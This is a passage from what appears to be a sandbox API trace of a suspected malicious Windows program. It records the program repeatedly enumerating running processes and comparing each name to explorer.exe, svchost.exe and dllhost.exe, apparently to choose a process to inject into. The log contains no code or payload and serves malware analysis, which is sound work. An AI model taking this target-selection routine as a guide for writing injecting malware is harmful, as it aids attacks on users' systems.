(lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0238.602] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0238.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0238.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0238.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.603] CloseHandle (hObject=0xec) returned 1 [0238.603] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0238.603] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0238.603] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0238.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0238.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0238.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.603] CloseHandle (hObject=0xec) returned 1 [0238.604] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0238.604] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0238.604] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0238.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0238.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0238.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.604] CloseHandle (hObject=0xec) returned 1 [0238.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0238.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0238.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0238.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0238.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0238.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.605] CloseHandle (hObject=0xec) returned 1 [0238.605] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0238.605] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0238.605] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0238.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0238.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0238.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.606] CloseHandle (hObject=0xec) returned 1 [0238.606] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0238.606] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0238.606] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0238.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0238.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0238.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.606] CloseHandle (hObject=0xec) returned 1 [0238.606] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0238.606] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0238.606] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0238.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0238.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0238.607] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.607] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.607] CloseHandle (hObject=0xec) returned 1 [0238.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0238.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0238.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0238.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0238.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0238.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.608] CloseHandle (hObject=0xec) returned 1 [0238.608] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0238.608] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0238.608] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0238.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0238.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0238.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.608] CloseHandle (hObject=0xec) returned 1 [0238.608] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0238.608] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0238.608] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0238.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0238.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0238.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.609] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.609] CloseHandle (hObject=0xec) returned 1 [0238.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0238.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0238.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0238.609] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0238.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0238.610] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.610] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.610] CloseHandle (hObject=0xec) returned 1 [0238.610] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0238.610] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0238.610] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0238.610] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0238.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0238.610] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.610] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.610] CloseHandle (hObject=0xec) returned 1 [0238.611] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0238.611] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0238.611] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0238.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0238.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0238.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.611] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.611] CloseHandle (hObject=0xec) returned 1 [0238.611] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0238.611] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0238.611] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0238.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0238.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0238.612] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.612] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.612] CloseHandle (hObject=0xec) returned 1 [0238.612] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0238.612] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0238.612] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0238.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0238.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0238.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.613] CloseHandle (hObject=0xec) returned 1 [0238.613] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0238.613] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0238.613] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0238.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0238.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0238.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.613] CloseHandle (hObject=0xec) returned 1 [0238.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0238.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0238.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0238.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0238.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0238.614] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.614] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.614] CloseHandle (hObject=0xec) returned 1 [0238.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0238.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0238.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0238.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0238.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0238.615] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.615] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.615] CloseHandle (hObject=0xec) returned 1 [0238.615] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0238.615] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0238.615] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0238.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0238.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0238.615] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.615] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.615] CloseHandle (hObject=0xec) returned 1 [0238.615] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0238.615] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0238.615] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0238.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0238.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0238.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0238.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0238.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0238.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0238.618] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.619] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.619] CloseHandle (hObject=0xec) returned 1 [0238.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0238.619] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.619] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.619] CloseHandle (hObject=0xec) returned 1 [0238.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0238.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0238.620] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.620] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.620] CloseHandle (hObject=0xec) returned 1 [0238.620] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0238.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0238.621] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.621] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.621] CloseHandle (hObject=0xec) returned 1 [0238.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0238.622] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.622] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.622] CloseHandle (hObject=0xec) returned 1 [0238.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0238.622] CloseHandle (hObject=0xe8) returned 1 [0238.622] Sleep (dwMilliseconds=0x3e8) [0239.649] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0239.650] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0239.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0239.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0239.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 